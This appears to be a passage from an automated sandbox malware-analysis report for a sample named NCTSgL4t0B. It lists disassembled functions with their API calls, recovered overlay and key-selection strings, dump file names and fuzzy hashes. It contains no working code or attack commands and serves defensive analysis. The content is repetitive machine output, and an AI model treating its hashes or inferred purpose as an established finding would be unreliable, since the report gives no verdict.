                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B412732A2AB43A6EE59AF55E490238B7A5FF44F40F895035CE4D47354EF3DE841A3A0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF735DBBA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBA31
                                                                                                                                                                                                                • Part of subcall function 00007FF735DBBA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBA5A
                                                                                                                                                                                                                • Part of subcall function 00007FF735DBBA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBA83
                                                                                                                                                                                                                • Part of subcall function 00007FF735DBBA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBAB8
                                                                                                                                                                                                                • Part of subcall function 00007FF735DBBA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBAE1
                                                                                                                                                                                                                • Part of subcall function 00007FF735DBBA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF735DA12AE), ref: 00007FF735DBBB10
                                                                                                                                                                                                                • Part of subcall function 00007FF735DBBA00: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DBBB94
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA12CD
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA12F2
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA1314
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA1336
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA1358
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA137A
                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF735DA139C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: 87b8cf33815b13a2c5041e91584307a4fa0fed80dc9b28761f4af4000df7e558
                                                                                                                                                                                                              • Instruction ID: 4e0849cf3b7446d051e2b1b0eba98d1318fabbb1bb3fb894bfa8c45b143d5b02
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87b8cf33815b13a2c5041e91584307a4fa0fed80dc9b28761f4af4000df7e558
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95312821B2F683A5FE9AAFA1D490639A3A0EF45F40F885035C90D477A1DF2CE941A370
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$free$malloc
                                                                                                                                                                                                              • String ID: ##Overlay
                                                                                                                                                                                                              • API String ID: 1393892039-3248624929
                                                                                                                                                                                                              • Opcode ID: 1f0c51854f2e397330435cefd1d00fe77ff43c718336296e58be221f38198356
                                                                                                                                                                                                              • Instruction ID: 6f2df0cf5dbef8e5c199296bc5feff05e2b3c81779bcf5369822e53819e4d97e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f0c51854f2e397330435cefd1d00fe77ff43c718336296e58be221f38198356
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F622E272505BC189D310DF29E8445D877A8F745F68FAC433AEAA40B398DF74A1A1C768
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                              • Opcode ID: 61aa60da59db7c650cb9f0918b368bae93579de1a9ec62b6489cefe82620e32f
                                                                                                                                                                                                              • Instruction ID: 026b999e7f7f01cf0c6b40bc5ec6022b0c4104f4928dc4e9c0b665201abbfbb3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61aa60da59db7c650cb9f0918b368bae93579de1a9ec62b6489cefe82620e32f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83314832A2A683B6FF95AF51D490278A3A1FF84F40F885435C94E477A4DF3CE541A720
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF735DE752B
                                                                                                                                                                                                              • ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF735DE754A
                                                                                                                                                                                                              • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF735DE757C
                                                                                                                                                                                                              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF735DE7597
                                                                                                                                                                                                              • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF735DE75E3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Init@?$basic_streambuf@V?$basic_streambuf@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1830095303-0
                                                                                                                                                                                                              • Opcode ID: 32febbce372a9926f610f8dd6ac977c5ec191ea6a007aa2f0d8974d3562481d5
                                                                                                                                                                                                              • Instruction ID: dd07108957719ab4d65549446480a0ccd726c971338c55da3eec7ec8d0f41bea
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 32febbce372a9926f610f8dd6ac977c5ec191ea6a007aa2f0d8974d3562481d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6317632615B8291EB14DF2AEA9432DB7A0FB89F89F448131CA8D47724CF39C166D740
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF735DE67B3
                                                                                                                                                                                                              • ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF735DE67D2
                                                                                                                                                                                                              • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF735DE6804
                                                                                                                                                                                                              • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF735DE681F
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE7CF0: ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF735DE7D2A
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE7CF0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF735DE7D47
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE7CF0: _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DE7D70
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE7CF0: ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF735DE7DBB
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE7CF0: ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF735DE7DD0
                                                                                                                                                                                                              • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF735DE686B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Fiopen@std@@U_iobuf@@V?$basic_streambuf@Vlocale@2@_get_stream_buffer_pointers
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2682282330-0
                                                                                                                                                                                                              • Opcode ID: f33a761491909d7b4dbe81a338dc14efbaa838da8a8269b000a42f2c3f335eae
                                                                                                                                                                                                              • Instruction ID: 7d96a9bc68817edcbcfc0551e29d29beba17dd2dedb7b65b02020db10f7ddca9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f33a761491909d7b4dbe81a338dc14efbaa838da8a8269b000a42f2c3f335eae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E218C32618B8296EB14DF25F89432AB7A4FB49F89F848135DA8D87B28CF3DD105C750
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ControlDevice$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                              • String ID: NPC
                                                                                                                                                                                                              • API String ID: 2054765191-3492492454
                                                                                                                                                                                                              • Opcode ID: bcaba0927105816e3e999f3c7db0e4978fc75d252b1958c3a3439da8e2f212f2
                                                                                                                                                                                                              • Instruction ID: 32b2c0cb8f1a093d82c710862aba70d4819fba377c9793cf72bdb9dc2d5cc0cb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcaba0927105816e3e999f3c7db0e4978fc75d252b1958c3a3439da8e2f212f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB61CB73B19782AAEB14DF64E4803AD73E0EB44B98F808635EE5D07B98CF38D6559350
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF735DD6CC5
                                                                                                                                                                                                                • Part of subcall function 00007FF735DEB9D8: MultiByteToWideChar.KERNEL32 ref: 00007FF735DEB9F4
                                                                                                                                                                                                                • Part of subcall function 00007FF735DEB9D8: GetLastError.KERNEL32 ref: 00007FF735DEBA02
                                                                                                                                                                                                              • __std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF735DD6D71
                                                                                                                                                                                                                • Part of subcall function 00007FF735DE93C0: memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF735DD7251), ref: 00007FF735DE94C3
                                                                                                                                                                                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD6E1B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __std_fs_convert_narrow_to_wide$ByteCharErrorLastMultiWide_invalid_parameter_noinfo_noreturnmemmove
                                                                                                                                                                                                              • String ID: Unknown exception
                                                                                                                                                                                                              • API String ID: 258765704-410509341
                                                                                                                                                                                                              • Opcode ID: 8170960e2da90011fc7bdb144ee5cb6efa36b9f96b4b95913af18e5dfb15874b
                                                                                                                                                                                                              • Instruction ID: bfb1b6baab2727c92e938a69154a1d1983d888aab5bf74d57b40595eaa6c3fd5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8170960e2da90011fc7bdb144ee5cb6efa36b9f96b4b95913af18e5dfb15874b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F4102A2A28796A1EB18AF66E48476CA390EF44FC8F944031DE4D07744DF3CE491D380
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateThread_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                              • String ID: Press Key$Select Key
                                                                                                                                                                                                              • API String ID: 2430190256-2074042277
                                                                                                                                                                                                              • Opcode ID: 499aa2a7c659b6a84dd94e367b045d99161d7b41431c0e4b921a0de9bc7ab3c0
                                                                                                                                                                                                              • Instruction ID: ad5f8e649d89f211b8dee07e1a2b7060573b2e108e5aa5163061c7a9b52ef6f8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 499aa2a7c659b6a84dd94e367b045d99161d7b41431c0e4b921a0de9bc7ab3c0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C231D772A286C391EB54EB18E4C037AE751EF81FE0F909235EE5E06AD9DF2CD4849710
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Context$CompositionReleaseWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 244372355-3916222277
                                                                                                                                                                                                              • Opcode ID: e1277b29f0780cca18283900559f5205b95fb5625325ea21f4a6762f94f4308b
                                                                                                                                                                                                              • Instruction ID: 0528476c7d13f73787efe029d9ca4b37f2ce4d948b1826ecbf77efb2ebe83c42
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1277b29f0780cca18283900559f5205b95fb5625325ea21f4a6762f94f4308b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 88018436A18B4292EA25AF16F554269F3A1FB8CFD4F840135DE8C47715EF3CE4449B20
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: freemallocmemmove
                                                                                                                                                                                                              • String ID: %.*s$#CLOSE$#COLLAPSE
                                                                                                                                                                                                              • API String ID: 2537350866-830562872
                                                                                                                                                                                                              • Opcode ID: b1209a498c370f522969e5e8d79b3fa9658dcc679ffb50dd430fcc853a4a17b8
                                                                                                                                                                                                              • Instruction ID: 0d287e5fc7e8eca64faef39a9d3104402ffe89f8bb552d0e3485f61e8b692ca4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1209a498c370f522969e5e8d79b3fa9658dcc679ffb50dd430fcc853a4a17b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77321632B28682ABE709DB36C5802E9B7A0FF59B54F448735DB18572A1DF38F461DB10
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: mallocmemmove$free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4023028716-0
                                                                                                                                                                                                              • Opcode ID: 0cb17226824ab7b0607adb79a8304e4d00a1ea62160d775fd7a1e4c91e7eed0a
                                                                                                                                                                                                              • Instruction ID: 5b620ce9c2d4110366aafc3be2c54f33a70477c610ee50f31194c0c99efa6b85
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0cb17226824ab7b0607adb79a8304e4d00a1ea62160d775fd7a1e4c91e7eed0a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5641C032A19BC396EB549F25A4801B8B3A1FB88F84F584236DE5D87799DF3CE441D720
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: powf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3445610689-0
                                                                                                                                                                                                              • Opcode ID: 86c057f93ea16fe2871d44cefd3ec9c2ac7bb55b00e45b83bd5f4eff3c984cd3
                                                                                                                                                                                                              • Instruction ID: f0c7f6b3ff83930ef4b66400848906f21d8056c6b3f3259884dff8e8c6057009
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86c057f93ea16fe2871d44cefd3ec9c2ac7bb55b00e45b83bd5f4eff3c984cd3
